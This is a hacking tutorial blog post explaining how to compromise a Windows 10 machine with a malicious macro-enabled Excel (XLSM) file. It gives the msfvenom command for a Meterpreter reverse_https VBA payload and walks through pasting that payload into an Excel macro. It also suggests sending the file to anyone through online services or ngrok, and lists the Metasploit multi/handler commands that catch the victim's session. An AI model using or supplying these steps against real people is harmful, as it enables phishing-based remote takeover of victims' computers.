Window Hacking

Exploit Windows 10 with Excel File ( Macros )

Hey Folks, in this tutorial we will show you the way through which we can easily exploit any windows machine using malicious macros. We know that many people will be familiar with macros because it is a part of Microsoft Excel software and sometimes we use Excel in our routine, but if you are not aware of it, then first we talk about macros.

What is Macros?

A macro is an action or a set of actions that you can run as many times as you want. You can create and then run a macro that quickly applies these formatting changes to the cells you select.

Let’s take a look πŸ™‚ !!

Create VBA Payload

First of all we have to generate a malicious VBA script. Let’s fire up the kali linux and execute the below command but make sure that you provide your localhost address in the command. After setting everything we execute the command to create a vba script.

msfvenom -p windows/meterpreter/reverse_https lhost= lport=1234 -f vba

Done πŸ™‚ !! The payload has been ready but now we have to inject this payload into β€œXLSM” file.

Q– But the question is, why do we have to create only malicious payloads in XLSM files ?

A – The XLSM file is a macro-enabled spreadsheet created by Microsoft Excel which is why we choose this format to embed its malicious VBA script inside it. Let’s boot the Excel software -> write any content in empty columns -> go to the β€œview” tab -> click on macros and select its sub menu option β€œview macrosβ€œ.

After that a new tab will appear on the screen as shown in the given figure, in which we have to enter any name to create a macro and then click on the β€œcreate” button.

Alright πŸ™‚ !! Now we will come back to kali linux machine, copy the payload that we created earlier and paste the entire code here. But remember to clear everything before pasting the code.

After successfully pasting the entire code, we press both β€œCTRL + S” keys simultaneously at the same time to save the document on the same tab. After that we enter the name of the document and select the type of documents to β€œExcel Macro-enabled Workbookβ€œ.

Done πŸ˜› !! Finally, a β€œxlsm” file format malicious document has agreed to give us access to the victim machine. Now you can send it to anyone through online services or using ngrok service in kali linux and take a meterpreter session of its entire system.

Hmm πŸ™‚ !! Again we have to come back to our operating system kali linux and setup the multi-handler to catch up the meterpreter session of victim machine.

use multi/handler
set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
set lhost
set lport 1234

Victim ( Demonstration )

When the victim opens this document, they receive a security warning as shown in the image below, but as soon as the victim clicks the β€œEnable Content” button, all macros are allowed and we get the meterpreter session.

Amazing πŸ˜› !! That’s what we thought ! as you can see, after users enable macros permission, we get a meterpreter session of their entire system.

Similarly in our upcoming article we will demonstrate the same thing with different -2 methods.

About the Author
Shubham Goyal Certified Ethical Hacker, information security analyst, penetration tester and researcher. Can be Contact on Linkedin.

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